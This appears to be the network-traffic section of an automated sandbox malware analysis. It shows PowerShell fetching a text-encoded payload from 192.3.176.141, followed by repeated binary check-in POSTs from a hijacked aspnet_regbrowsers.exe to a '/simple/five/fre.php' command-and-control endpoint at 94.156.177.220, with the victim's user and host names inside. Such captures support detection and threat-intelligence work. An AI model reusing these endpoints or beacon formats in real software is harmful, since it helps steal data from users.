                                                                                            5192.168.2.2249175192.3.176.141803804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:43.964687109 CEST77OUTGET /41/SMPLRTT.txt HTTP/1.1
                                                                                            Host: 192.3.176.141
                                                                                            Connection: Keep-Alive
                                                                                            Oct 25, 2024 19:51:45.704380035 CEST1236INHTTP/1.1 200 OK
                                                                                            Date: Fri, 25 Oct 2024 17:51:44 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                            Last-Modified: Fri, 25 Oct 2024 03:50:09 GMT
                                                                                            ETag: "22aac-6254503f09080"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 141996
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: text/plain
                                                                                            Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                            Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.704396963 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.704408884 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.704454899 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.704467058 CEST424INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.704479933 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.704489946 CEST248INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.774933100 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.774949074 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.774966955 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            Oct 25, 2024 19:51:45.775042057 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.224917694.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:50.139506102 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 176
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:50.145220995 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: 'ckav.ruAlbus849224ALBUS-PCk0DE4229FCF97F5879F50F8FD32FqPF
                                                                                            Oct 25, 2024 19:51:51.113399029 CEST228INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:51:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 15
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.224917794.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:51.609496117 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 176
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:51.616426945 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: 'ckav.ruAlbus849224ALBUS-PC+0DE4229FCF97F5879F50F8FD3q99iP
                                                                                            Oct 25, 2024 19:51:52.585231066 CEST228INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:51:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 15
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.224917894.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:52.666205883 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:52.671652079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:51:53.648555040 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:51:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.224917994.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:53.902439117 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:53.908423901 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:51:55.136472940 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:51:54 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.224918094.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:55.324877977 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:55.330638885 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:51:56.284284115 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:51:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.224918194.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:56.428042889 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:56.433698893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:51:57.409168005 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:51:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.224918294.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:57.552912951 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:57.559758902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:51:58.522156954 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:51:58 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.224918394.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:59.251210928 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:51:59.256820917 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:00.220825911 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.224918494.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:00.368541956 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:00.374097109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                            Oct 25, 2024 19:52:01.343830109 CEST236INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.26.1
                                                                                            Date: Fri, 25 Oct 2024 17:52:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 23
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/5.4.16
                                                                                            Status: 404 Not Found
                                                                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                            Data Ascii: File not found.


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.224918594.156.177.220803900C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:52:01.489933968 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                            Host: 94.156.177.220
                                                                                            Accept: */*
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Encoding: binary
                                                                                            Content-Key: 508F6F5C
                                                                                            Content-Length: 149
                                                                                            Connection: close
                                                                                            Oct 25, 2024 19:52:01.495589972 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                            Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
